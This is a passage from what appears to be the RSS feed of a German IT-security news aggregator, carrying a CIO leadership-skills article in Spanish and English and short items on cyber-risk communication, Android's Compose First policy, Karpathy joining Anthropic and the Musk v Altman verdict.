<p>Keyworth añade que otra de las habilidades que ha desarrollado en la F1 es la colaboración. “Creo que muchas organizaciones pueden ser bastante jerárquicas, y eso no ocurre en un equipo de Fórmula 1”, señala. “Estamos en una sala intentando resolver problemas, así que se eliminan los rangos y abordamos los retos juntos. Ese enfoque me ha enseñado mucho sobre la conexión humana y el liderazgo. El éxito consiste en crear una estructura plana, centrarse en el problema y afrontarlo, independientemente del rango”.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h3 class="wp-block-heading">2. Reclutamiento: aceptar el cambio desarrolla nuevas habilidades de liderazgo</h3>



<p>Ankur Anand, CIO global del proveedor de soluciones tecnológicas y de talento Nash Squared, se incorporó en junio de 2023 tras casi seis años en Manpower Group, donde llegó a ser CIO regional y responsable de transformación para Europa. Antes de ese puesto, pasó 15 años en posiciones tecnológicas de alto nivel en el gigante de servicios financieros Citi.</p>



<p>“La profundidad de experiencia que obtuve de esas etapas fue enorme”, afirma. “Sentí que podía llevar ese conocimiento a una organización de tamaño medio con un gran apetito de crecimiento. Quería generar impacto basándome en todo lo aprendido a lo largo de mi carrera”.</p>



<p>Durante sus tres años en Nash Squared, Anand se ha centrado en crear una visión única de los datos del cliente, establecer procesos de gestión del cambio y adoptar tecnologías emergentes. Moverse entre organizaciones le preparó para la transformación que lidera. “La gente puede subestimar su capacidad para adaptarse al cambio y al comportamiento necesario en términos de cómo reaccionas, gestionas equipos y trabajas con los <em>stakeholders</em>”, afirma. “Es un cambio enorme pero positivo porque empiezas a adaptarte a diferentes modelos operativos y a desarrollar distintos estilos de liderazgo. Lo que funciona en una empresa no necesariamente funciona en otra”.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h3 class="wp-block-heading">3. Servicios de contenidos: la adaptabilidad marca la diferencia</h3>



<p>Joel Hron, CTO del especialista global en contenidos y tecnología Thomson Reuters, fue anteriormente CTO de la <em>startup </em>tecnológica ThoughtTrace, adquirida por Thomson Reuters en 2022. Hron se incorporó a la empresa como parte del proceso de adquisición.</p>



<p>“Este puesto fue una oportunidad para liderar un equipo global de 5.000 personas y cambiar la mentalidad hacia un enfoque más ágil y emprendedor”, explica. “Mover una organización de ese tamaño a nivel cultural era también algo que veía como un reto y una gran oportunidad”.</p>



<p>Asumir nuevos retos no es algo nuevo para Hron. Tras plantearse inicialmente trabajar en educación, realizó estudios de posgrado, pero se sintió atraído por la investigación y el desarrollo en el mundo real, especialmente en programación, modelización y previsión en la industria petrolera.</p>



<p>“Creo que esa mentalidad se ha ido forzando en mí con el tiempo por la variedad de roles que he desempeñado”, añade. “Todas las pequeñas cosas que he aprendido se combinan para construir la intuición que tengo hoy. Cuando la gente me pregunta qué debería hacer a continuación, les digo que sean oportunistas, que digan sí más veces que no. Si confías en ti mismo y sientes que no es lo correcto, siempre podrás hacer otra cosa. Pero di sí y date la oportunidad de aprender algo nuevo y que te guste algo que no esperabas”.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h3 class="wp-block-heading">4. Sector inmobiliario: accionar palancas diferentes mejora las capacidades</h3>



<p>Richard Corbridge, CIO de la empresa inmobiliaria Segro, afirma que el actual énfasis en la IA y los datos significa que el rol del liderazgo digital vive un renacimiento. “Parece que la gente ha vuelto a reconocer que el CIO es el chef ejecutivo en la cocina”, afirma. “Creo que eso nos da una buena oportunidad para destacar”.</p>



<p>Un factor clave en este renacimiento, añade, es la “consumerización” de la tecnología impulsada por la movilidad, el <em>cloud </em>y ahora la IA generativa, que hace que los responsables de negocio estén tan interesados en la tecnología como los profesionales de TI.</p>



<p>“El rol del CIO es más social que hace diez años”, afirma. “Necesitas estar dentro del negocio, no al margen o por encima. Esa posición significa que un CIO que se mueve entre industrias va a adquirir conocimientos sobre diferentes demandas”.</p>



<p>En lugar de ser expertos únicamente en su propio ámbito, los CIO de éxito forman parte del equipo directivo que impulsa la transformación empresarial. Corbridge afirma que su amplia experiencia, incluyendo liderazgo TI en el NHS, en el retailer Boots y en el Departamento de Trabajo y Pensiones del Reino Unido, le ha ayudado a desarrollarse como CIO.</p>



<p>“Ha sido interesante trasladar la experiencia de grandes proyectos sanitarios al sector privado para ver qué palancas podía accionar de forma diferente”, señala.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h3 class="wp-block-heading">5. Tecnología: adoptar nuevas culturas genera energía</h3>



<p>Nick Pearson se incorporó a Ricoh Europa como CIO en 2023, tras liderar plataformas TI en Vodafone. También ha ocupado puestos directivos en RS Group y PepsiCo, donde llegó a ser director de TI en Reino Unido. Afirma que cambiar de sector ayuda a diversificar habilidades, especialmente al adoptar nuevas culturas.</p>



<p>“Es la primera empresa japonesa en la que trabajo”, explica. “Aunque es un negocio bastante descentralizado, hay una cultura de mejora continua. Es un enfoque distinto al de Vodafone, donde la gente se centraba en multiplicar por diez el impacto o el crecimiento de los proyectos”.</p>



<p>Pearson afirma que una de las cosas que ha aprendido es que la tolerancia al riesgo varía entre culturas. “En una empresa japonesa hay mucho más rigor en el seguimiento de proyectos y su estado que en una occidental”, señala. “El enfoque es muy orientado al dato: cuanta más información mejor. En una empresa de estilo estadounidense, el consejo suele querer saber solo si el proyecto va por buen camino”.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h3 class="wp-block-heading">6. Viajes: moverse entre sectores mantiene la agilidad mental</h3>



<p>Huy Dao, director de plataformas de datos y <em>machine learning</em> en Booking.com, ha pasado la parte reciente de su carrera ayudando a empresas tecnológicas a explotar sus datos. “Pasé 18 años en Microsoft, donde proporcionábamos principalmente soluciones tecnológicas como Office”, afirma. “Lo interesante ahora es que puedo aprender sobre un nuevo sector, y eso me mantiene alerta”.</p>



<p>Como parte de un equipo central, Dao asegura que su equipo dispone de las herramientas adecuadas para su trabajo y ayuda a desarrollar productos basados en datos de alta calidad. “Mi rol se centra en cómo se aplica la tecnología al sector viajes. Intento entender cómo funciona el negocio, cómo se sienten nuestros clientes y cómo evolucionan nuestras relaciones con <em>partners</em>”, concluye. “La industria es muy interesante, y eso me motiva a seguir aprendiendo y aportando cada día”.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[6 ways CIOs should diversify leadership skills]]></title>
<description><![CDATA[Doing a great job in your current role is table stakes for modern CIOs. The most successful digital leaders embrace new challenges in situ and in fresh working environments, and with research reporting the average tenure for any digital leadership role to be about five years, the ability to move ...]]></description>
<link>https://tsecurity.de/de/3532503/it-security-nachrichten/6-ways-cios-should-diversify-leadership-skills/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3532503/it-security-nachrichten/6-ways-cios-should-diversify-leadership-skills/</guid>
<pubDate>Wed, 20 May 2026 12:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Doing a great job in your current role is table stakes for modern CIOs. The most successful digital leaders embrace new challenges in situ and in fresh working environments, and with research reporting the <a href="https://www.cio.com/article/252537/careers-staffing-a-strong-job-market-for-cios.html">average tenure for any digital leadership role</a> to be about five years, the ability to move seamlessly into new opportunities has never been more crucial.</p>



<p>Evidence also suggests that CIOs who think outside the box and move between positions, employers, and industries better develop their leadership skills and produce benefits for their teams, businesses, and end customers. From generating novel solutions to embracing different cultures, here are examples from six specific industries on how broad experiences help diversify CIO leadership skills.</p>



<h2 class="wp-block-heading">1. Formula One: focusing on teamwork produces novel solutions</h2>



<p>Dan Keyworth, executive director, performance technology and systems at McLaren Racing, says leading technology in the fast-paced world of Formula One has fostered new skills.</p>



<p>“Being in a high-octane environment, you learn how the tools you provide to people make a material difference,” he says. “In some organizations where operations are a little slower, people don’t understand the tangible impact technology has.”</p>



<p>Keyworth says success in F1 is about using data to find a competitive edge. Having spent nine years with technology specialist Fujitsu, he joined McLaren in 2017. And during his time in motor racing, McLaren has continued to improve on the track, culminating in last season’s successes, where the team won the Constructors’ Championship and Lando Norris won his first driver’s title.</p>



<p>“That’s been an incredible journey for me, because as we’ve gone up the pecking order, I’ve realized how critical our technology is, and where there are opportunities to evolve and develop,” he says.</p>



<p>Keyworth says the other skill he’s developed in F1 is <a href="https://www.cio.com/article/4111281/from-integration-pain-to-partnership-gain-how-collaboration-strengthens-cybersecurity.html?utm=hybrid_search">collaboration</a>. “I think many organizations can be quite hierarchical, and you don’t find that in a Formula One team,” he says. “We’re in a room trying to solve problems, so ranks are removed and we go after challenges together. That approach has taught me a lot about human connection and leadership. Success is about creating a flat structure, getting around the problem, and getting stuck into something, no matter what the rank.”</p>



<h2 class="wp-block-heading">2. Recruitment: welcoming change develops new leadership skills</h2>



<p>Ankur Anand, group CIO at technology and talent solutions provider Nash Squared, joined in June 2023, after nearly six years at Manpower Group, where he rose to regional CIO and head of transformation for Europe. Before this role, he spent 15 years in senior technology positions at financial services giant Citi.</p>



<p>“The depth of experience I got from those experiences was enormous,” he says. “I felt I could take that knowledge into a mid-size organization with a huge appetite to grow. I wanted to create an impact based on all the learnings from my career.”</p>



<p>In his three years with Nash Squared, Anand has focused on creating a single view of customer data, <a href="https://www.cio.com/article/1249347/8-change-management-questions-every-it-leader-must-answer.html?utm=hybrid_search">establishing change management processes</a>, and embracing emerging technology. Moving between organizations prepared him for the transformation he oversees.</p>



<p>“People can underestimate their ability to transition into change and required behavior in terms of how you react, manage people, and work with stakeholders,” he says. “It’s an enormous but positive change because you start adapting to different operating models and developing different leadership styles. What works in one environment with one business doesn’t necessarily work in another.”</p>



<h2 class="wp-block-heading">3. Content services: being adaptable marks you out for success</h2>



<p>Joel Hron, CTO at global content and technology specialist Thomson Reuters, was previously CTO at tech startup ThoughtTrace, which Thomson Reuters acquired in 2022. Hron joined the firm as part of the acquisition process.</p>



<p>“This role was a chance to lead a global team of 5,000 and shift the mindset into a more agile, entrepreneurial one,” he says. “To move an organization of that scale and size culturally was also something I saw as a challenge and a great opportunity.”</p>



<p>Taking on a fresh challenge is nothing new to Hron. After initially aiming to work in education, he attended graduate school, but was drawn to real-world research and development, particularly programming, modelling, and forecasting in the petroleum industry. After his stint in the startup sector, he says switching to Thomson Reuters honed his adaptability.</p>



<p>“I think that mindset has been forced into me over time because of the variety of roles I’ve had,” he adds. “All the small things I’ve learned come together to build the intuition I have today. When people ask me what should I do next, I tell them just be opportunistic, say yes more than you say no. If you trust yourself and feel it’s not the right thing, you can do something else. But say yes and give yourself the chance to learn something new and like something you didn’t expect.”</p>



<h2 class="wp-block-heading">4. Property: pulling different levers hones capabilities</h2>



<p>Richard Corbridge, CIO at property specialist Segro, says <a href="https://www.cio.com/article/4117094/data-management-trends-whats-in-whats-out.html?utm=hybrid_search">the current emphasis on AI and data</a> means the digital leadership role is having a renaissance. “People seem to have landed back on the fact that the CIO is the executive chef in the kitchen,” he says. “I think that gives us a good opportunity to shine.”</p>



<p>One crucial factor in this renaissance, he adds, is the consumerization of technology fostered through mobility, the cloud, and now gen AI, which means LOB colleagues are as eager to learn about technology as their IT peers. From now on, digital leaders will be expected to source great ideas from across the organization.</p>



<p>“CIO is a more social role than 10 years ago,” he says. “You need to be in your business, not aside or on top of it. That positioning means a CIO who’s going from industry to industry is going to pick up knowledge of different demands.”</p>



<p>Rather than being experts within their own domain, successful CIOs are members of the senior leadership team that drives <a href="https://www.cio.com/article/4154263/10-ways-to-accelerate-digital-transformation-2.html?utm=hybrid_search">business transformation</a>. Corbridge says his own broad experiences, including leading IT for the NHS, high-street retailer Boots, and the UK government’s Department for Work and Pensions, have helped him develop as a CIO.</p>



<p>“It’s been enjoyable taking big healthcare project experience to the private sector to see what levers I can pull differently,” he says.</p>



<h2 class="wp-block-heading">5. Technology: embracing new cultures creates energy</h2>



<p>Nick Pearson joined Ricoh Europe as CIO in 2023, after being head of IT platform at Vodafone. He’s also held senior tech roles at RS Group and PepsiCo, eventually becoming UK IT director. He says moving sectors helps leaders diversify skills, particularly when embracing new cultures.</p>



<p>“This is the first Japanese company I’ve worked for,” he says. “While it’s a loosely federated business, there’s a culture of Kaizen and continuous improvement. That’s a different approach to Vodafone, where people were focused on achieving 10 times the impact, productivity, or growth of projects.”</p>



<p>Pearson says one of the things he’s learned at Ricoh is that risk appetites can vary across cultures. “There’s a lot more rigor in project tracking and statuses in a Japanese firm than you’d expect in a Western company,” he says. “The approach is data-rich: the more information the better. In a US-style company, the board often just wants to know if a project is on track, and the rest of the deliverables are your concern. It’s super-energizing, and I’ve gained knowledge by experiencing different cultures.”</p>



<p>Pearson says being a CIO in the technology sector has also helped him appreciate the importance of product portfolio management skills. “In an IT services company, where the technology is changing so often, success means thinking about how you continually evolve your portfolio without cannibalizing your star product,” he says.</p>



<h2 class="wp-block-heading">6. Travel: moving between domains keeps you sharp</h2>



<p>Huy Dao, director of data and machine learning platform at travel specialist Booking.com, has spent the recent part of his career helping tech-focused companies like Zwift, Zillow, and now Booking exploit their data assets. Earlier in his career, he worked for one of the world’s biggest technology companies.</p>



<p>“I spent 18 years at Microsoft where we were primarily providing tech solutions, such as Office,” he says. “What’s interesting for me now is I get to learn about a new business domain, and that keeps me on my toes.”</p>



<p>As part of a central group that provides data and ML capabilities to Booking, Dao ensures his team has the right tools to complete their work. He also helps employees build and operate highly governed, high-quality data-enabled products.</p>



<p>“My role centers on how technology is applied to travel. I aim to understand how the business works, how our customers feel, and how our partner relationships are going,” he says. “The industry is very interesting, and that keeps me motivated to learn and contribute every day.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Communicating cyber risk in dollars boards understand]]></title>
<description><![CDATA[In this Help Net Security interview, Nick Nieuwenhuis, Cybersecurity Architect at Nedscaper, explains why cybersecurity has not delivered the resilience that decades of investment have promised. He argues that spending has leaned too heavily on technical controls while neglecting people,…
Read mo...]]></description>
<link>https://tsecurity.de/de/3531963/it-security-nachrichten/communicating-cyber-risk-in-dollars-boards-understand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3531963/it-security-nachrichten/communicating-cyber-risk-in-dollars-boards-understand/</guid>
<pubDate>Wed, 20 May 2026 09:07:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this Help Net Security interview, Nick Nieuwenhuis, Cybersecurity Architect at Nedscaper, explains why cybersecurity has not delivered the resilience that decades of investment have promised. He argues that spending has leaned too heavily on technical controls while neglecting people,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/communicating-cyber-risk-in-dollars-boards-understand/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/communicating-cyber-risk-in-dollars-boards-understand/">Communicating cyber risk in dollars boards understand</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Communicating cyber risk in dollars boards understand]]></title>
<description><![CDATA[In this Help Net Security interview, Nick Nieuwenhuis, Cybersecurity Architect at Nedscaper, explains why cybersecurity has not delivered the resilience that decades of investment have promised. He argues that spending has leaned too heavily on technical controls while neglecting people, processe...]]></description>
<link>https://tsecurity.de/de/3531919/it-security-nachrichten/communicating-cyber-risk-in-dollars-boards-understand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3531919/it-security-nachrichten/communicating-cyber-risk-in-dollars-boards-understand/</guid>
<pubDate>Wed, 20 May 2026 08:53:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this Help Net Security interview, Nick Nieuwenhuis, Cybersecurity Architect at Nedscaper, explains why cybersecurity has not delivered the resilience that decades of investment have promised. He argues that spending has leaned too heavily on technical controls while neglecting people, processes, and organizational dynamics. He unpacks the gap between security teams and boards, pointing to weak risk communication and a reliance on qualitative heatmaps over hard evidence. He pushes back on root cause analysis as … <a href="https://www.helpnetsecurity.com/2026/05/20/nick-nieuwenhuis-nedscaper-cyber-resilience-strategy/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/05/20/nick-nieuwenhuis-nedscaper-cyber-resilience-strategy/">Communicating cyber risk in dollars boards understand</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What's new in Android]]></title>
<description><![CDATA[Author: Google for Developers - Bewertung: 78x - Views:787 Explore what’s new in Android development. Explore new UI breakthroughs with Jetpack Compose, improvements in developer productivity, and how to unlock additional form factors for your app. Learn about Android 17, including performance im...]]></description>
<link>https://tsecurity.de/de/3531049/videos/whats-new-in-android/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3531049/videos/whats-new-in-android/</guid>
<pubDate>Wed, 20 May 2026 00:47:34 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Google for Developers - Bewertung: 78x - Views:787 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/sig3n7XyaaA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Explore what’s new in Android development. Explore new UI breakthroughs with Jetpack Compose, improvements in developer productivity, and how to unlock additional form factors for your app. Learn about Android 17, including performance improvements, new capabilities for media and camera apps, new functionality for desktop and large screened apps, and how we're using agentic automation to empower users to get more done faster.<br />
<br />
Speakers: Nick Butcher, Ash Nohe, Daniel Galpin<br />
<br />
Watch the Android sessions from Google I/O 2026 → https://goo.gle/Android-at-IO2026<br />
<br />
Subscribe to Android Developers → https://goo.gle/AndroidDevs<br />
<br />
<br />
#GoogleIO<br />
<br />
<br />
Event: Google I/O 2026<br />
<br />
Products Mentioned: Android, Mobile, AI/Machine Learning<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android UI Development is Compose First]]></title>
<description><![CDATA[Posted by Nick Butcher, Product ManagerIn the almost-5-years since Jetpack Compose launched, we've invested in bringing you all the features, performance and tools that you need to build amazing UIs across the variety of Android devices. Compose helps you to build beautiful, adaptive UIs that mee...]]></description>
<link>https://tsecurity.de/de/3530267/android-tipps/android-ui-development-is-compose-first/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3530267/android-tipps/android-ui-development-is-compose-first/</guid>
<pubDate>Tue, 19 May 2026 19:56:28 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeAAKGvcISwZB1rAtP_MUJKvsLndh8bMp7dWt_R_FEVpJIQ_lLtgfdF-4lv-M_A7MmzpcYWAivrE97yOzM_BnYsl_9z3k9htmzgWE6jgDAEVRr_Ze1USCBTZbHQGv9AHbu9G1O0Ligkl3JJjbfYG3ZHpynfW4ZSBQuzvlu5IYqL5HmCpvDixYuTLIn9mI/s2469/Compose%20first%20Meta.png">



<name content="IMG" twitter:image=""><p dir="ltr"></p><div class="separator"><i>Posted by Nick Butcher, Product Manager</i></div><p dir="ltr"></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwurx_En2UJz2gISQ0Gmi_qWVLOalzCmbskB1AfGhoFsZ9riDfcX6hE0lIdMAxkOkcjgPpa_2dGY0pzUXwSKAq4_fnTiukcOFaZRonMEiFKRr79JOS7U9nn6_41owsU4etOb2Hjsj3c3Z6Z2_8lzomDjMuuN9ry-k48jFpfeI3bkGlj96DSQG5cQEkO64/s8583/Compose%20first%20blog.png"><img border="0" data-original-height="2601" data-original-width="8583" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwurx_En2UJz2gISQ0Gmi_qWVLOalzCmbskB1AfGhoFsZ9riDfcX6hE0lIdMAxkOkcjgPpa_2dGY0pzUXwSKAq4_fnTiukcOFaZRonMEiFKRr79JOS7U9nn6_41owsU4etOb2Hjsj3c3Z6Z2_8lzomDjMuuN9ry-k48jFpfeI3bkGlj96DSQG5cQEkO64/s16000/Compose%20first%20blog.png"></a></div><p></p><p dir="ltr"><br></p><div>In the almost-5-years since Jetpack Compose <a href="https://android-developers.googleblog.com/2021/07/jetpack-compose-announcement.html">launched,</a> we've invested in bringing you all the features, performance and tools that you need to build amazing UIs across the variety of Android devices. Compose helps you to build beautiful, adaptive UIs that meet the demands of modern UI design.</div><div><ul><li><b>Rich feature set: </b>With a powerful library of layouts, input, graphics, animation APIs, and the latest Material Design components, Compose empowers you to build anything.</li><li><b>Highly performant: </b>Out of the box, Compose offers native performance, delivering a delightful experience to your users.</li><li><b>Adaptive:</b> Compose offers the easiest way to build adaptive apps that work across the range of Android form factors.</li><li><b>Productive: </b>With powerful tools like Previews and Live Edit and the full expressiveness of Kotlin, teams tell us that they move much faster when building with Jetpack Compose, reducing the time to market.</li></ul><div><div><br></div><div>Compose has matured into the standard for Android UI development—we believe that <b>all Android UI should be built with Compose</b>; we call this going <a href="http://developer.android.com/develop/ui/compose/first">Compose First.</a> From today, we'll provide all APIs, libraries, tools and guidance in Compose. We now consider the View components that Compose replaces (components in the <code>android.widget</code> package) to be in <b>maintenance mode</b>. We have no plans to deprecate or remove View components and will continue to support them with critical bug fixes, but they will receive no new features.</div></div></div><div><br></div><br><b>View-based Jetpack Libraries</b><br>The same goes for View based libraries like Fragments, RecyclerView or Viewpager — we consider them complete and will only publish critical bugfixes. For a complete list of libraries now in maintenance mode, <a href="http://developer.andoird.com/develop/ui/compose/first">see here</a>.<br><br><br><b>Tools</b><br>Any new Android Studio UI tools will be built for Jetpack Compose only. Existing view-based tools (such as the Navigation Editor and Layout Editor) are now in maintenance mode and will not receive new features.<br><br><br><b>Guidance</b><br>Documentation, codelabs, and samples will focus on building UI with Jetpack Compose. You can still find Views-specific documentation linked from pages that contain generic and Compose information, where relevant.<br></name><h2><name content="IMG" twitter:image=""><b>Happy Composing</b></name></h2><name content="IMG" twitter:image="">We recommend that you build all new features with Compose and convert existing features when you touch them to gain the many Compose benefits. Check out our <a href="https://github.com/android/skills">XML to Compose migration skill</a> to help you convert existing layouts to Compose. <br><br><br>To learn about the latest Compose release, check out <a href="https://android-developers.googleblog.com/2026/04/jetpack-compose-april-2026-updates.html">What’s new in the Jetpack Compose April ‘26 release</a> blog and the <a href="https://developer.android.com/jetpack/androidx/compose-roadmap">roadmap</a> for what’s planned ahead. <br><br><br>Thank you for all of the feature-requests and feedback that have helped shape Compose to become our recommended UI toolkit. As always, if you have any more <a href="http://goo.gle/compose-feedback">feedback</a>, let us know.  Happy composing!</name><div><name content="IMG" twitter:image=""><br></name></div><div><name content="IMG" twitter:image="">Explore this announcement and all Google I/O 2026 updates on <span></span><a href="https://io.google/2026/?utm_source=blogpost&amp;utm_medium=pr&amp;utm_campaign=devblogs&amp;utm_content=" rel="noopener nofollow noreferrer" target="_blank">io.google<span></span></a>.<p></p></name></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Co-Founder Andrej Karpathy Joins Anthropic Pre-Training Team]]></title>
<description><![CDATA[Andrej Karpathy, a well-known researcher and original co-founder of OpenAI, has officially taken a new job at Anthropic. Known for his past work running computer vision at Tesla and building the learning startup Eureka Labs, Karpathy shared the news online this Tuesday. He will step into a resear...]]></description>
<link>https://tsecurity.de/de/3529954/ios-mac-os/openai-co-founder-andrej-karpathy-joins-anthropic-pre-training-team/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529954/ios-mac-os/openai-co-founder-andrej-karpathy-joins-anthropic-pre-training-team/</guid>
<pubDate>Tue, 19 May 2026 18:40:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Andrej Karpathy, a well-known researcher and original co-founder of OpenAI, has officially taken a new job at Anthropic. Known for his past work running computer vision at Tesla and building the learning startup Eureka Labs, Karpathy shared the news online this Tuesday. He will step into a research and development position focused on large language models as Anthropic grows its team. He believes the next few years in this space will bring massive changes.



Karpathy leads a new research group using Claude for pre-training



At Anthropic, Karpathy joins the pre-training team under Nick Joseph. Pre-training is the heavy lifting phase where models get their basic knowledge before any fine-tuning happens. Anthropic hopes that having top talent here will help it build stronger systems.




https://twitter.com/karpathy/status/2056753169888334312




He will create and guide a specific group tasked with using the Claude model to speed up pre-training research itself. Instead of just throwing more computing power at the problem, Anthropic wants to use AI to help make its own models better. Joseph publicly welcomed Karpathy, noting he is perfectly suited for this exact challenge.



The researcher pauses his educational startup to focus on models



Karpathy is highly regarded for his ability to explain hard technical topics to the public. Recently, he founded Eureka Labs, a startup designed to rethink schooling with digital assistants. This move to Anthropic means Eureka Labs will take a back seat for now.



However, Karpathy made it clear that he still cares deeply about teaching. He plans to return to his learning projects in the future when the time is right. For now, he is fully focused on his new company and the work ahead.



Adding a recognized name like Karpathy gives Anthropic another major win. As the company competes directly with OpenAI and Google, bringing in a co-founder from its biggest rival shows how seriously it views the race to improve artificial intelligence.]]></content:encoded>
</item>
<item>
<title><![CDATA[Musk v Altman: tech bros at war over OpenAI – The Latest]]></title>
<description><![CDATA[A long and bitter legal battle between tech billionaires Elon Musk and Sam Altman has culminated in victory for the OpenAI boss. Musk has vowed to appeal the verdict. But what did the trial reveal about big tech and the global AI race? Lucy Hough speaks to Guardian US tech and power reporter Nick...]]></description>
<link>https://tsecurity.de/de/3529934/ai-nachrichten/musk-v-altman-tech-bros-at-war-over-openai-the-latest/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529934/ai-nachrichten/musk-v-altman-tech-bros-at-war-over-openai-the-latest/</guid>
<pubDate>Tue, 19 May 2026 18:33:44 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A long and bitter legal battle between tech billionaires Elon Musk and Sam Altman has culminated in victory for the OpenAI boss. Musk has vowed to appeal the verdict. But what did the trial reveal about big tech and the global AI race? Lucy Hough speaks to Guardian US tech and power reporter Nick Robins-Early</p> <a href="https://www.theguardian.com/news/video/2026/may/19/musk-v-altman-tech-bros-at-war-over-openai-the-latest">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Musk v Altman: tech bros at war over OpenAI – The Latest]]></title>
<description><![CDATA[A long and bitter legal battle between tech billionaires Elon Musk and Sam Altman has culminated in victory for the OpenAI boss. Musk has vowed to appeal the verdict. But what did the trial reveal about big tech and the global AI race?Lucy Hough speaks to Guardian US tech and power reporter Nick ...]]></description>
<link>https://tsecurity.de/de/3529847/ai-nachrichten/musk-v-altman-tech-bros-at-war-over-openai-the-latest/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529847/ai-nachrichten/musk-v-altman-tech-bros-at-war-over-openai-the-latest/</guid>
<pubDate>Tue, 19 May 2026 18:21:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A long and bitter legal battle between tech billionaires Elon Musk and Sam Altman has culminated in victory for the OpenAI boss. Musk has vowed to appeal the verdict. But what did the trial reveal about big tech and the global AI race?</p><p>Lucy Hough speaks to Guardian US tech and power reporter Nick Robins-Early</p> <a href="https://www.theguardian.com/technology/audio/2026/may/19/musk-v-altman-tech-bros-at-war-over-openai-the-latest">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Sam Altman’s victory over Elon Musk clears way for OpenAI’s trillion-dollar ambitions]]></title>
<description><![CDATA[OpenAI’s plans now seem all but guaranteed, given that the world’s richest man couldn’t put a stop to themOn Monday morning, a jury in Oakland, California, handed a resounding victory to Sam Altman and OpenAI in their long, bitter courtroom battle with Elon Musk.The federal jury found Altman, Ope...]]></description>
<link>https://tsecurity.de/de/3528378/it-nachrichten/how-sam-altmans-victory-over-elon-musk-clears-way-for-openais-trillion-dollar-ambitions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3528378/it-nachrichten/how-sam-altmans-victory-over-elon-musk-clears-way-for-openais-trillion-dollar-ambitions/</guid>
<pubDate>Tue, 19 May 2026 10:47:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenAI’s plans now seem all but guaranteed, given that the world’s richest man couldn’t put a stop to them</p><p>On Monday morning, a jury in Oakland, California, handed a resounding victory to Sam Altman and OpenAI in their long, bitter courtroom battle with Elon Musk.</p><p>The federal jury found Altman, OpenAI and its president, Greg Brockman, not liable for Elon Musk’s claims that they unjustly enriched themselves and broke a founding contract made with Musk when founding the startup. The unanimous verdict, delivered after less than two hours of deliberation, is a stark rebuke of Musk and his lawyer’s claims that Altman “stole a charity” through his leadership of OpenAI.</p><p><em>Nick Robins-Early contributed reporting</em></p> <a href="https://www.theguardian.com/technology/2026/may/18/altman-trial-victory-musk-openai">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nick Clegg-backed company using AI to fill global education gaps]]></title>
<description><![CDATA[Backed by former UK deputy prime minister Nick Clegg, Efekta is rolling out AI language lessons to state schools around the world]]></description>
<link>https://tsecurity.de/de/3525360/it-nachrichten/nick-clegg-backed-company-using-ai-to-fill-global-education-gaps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3525360/it-nachrichten/nick-clegg-backed-company-using-ai-to-fill-global-education-gaps/</guid>
<pubDate>Mon, 18 May 2026 11:02:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
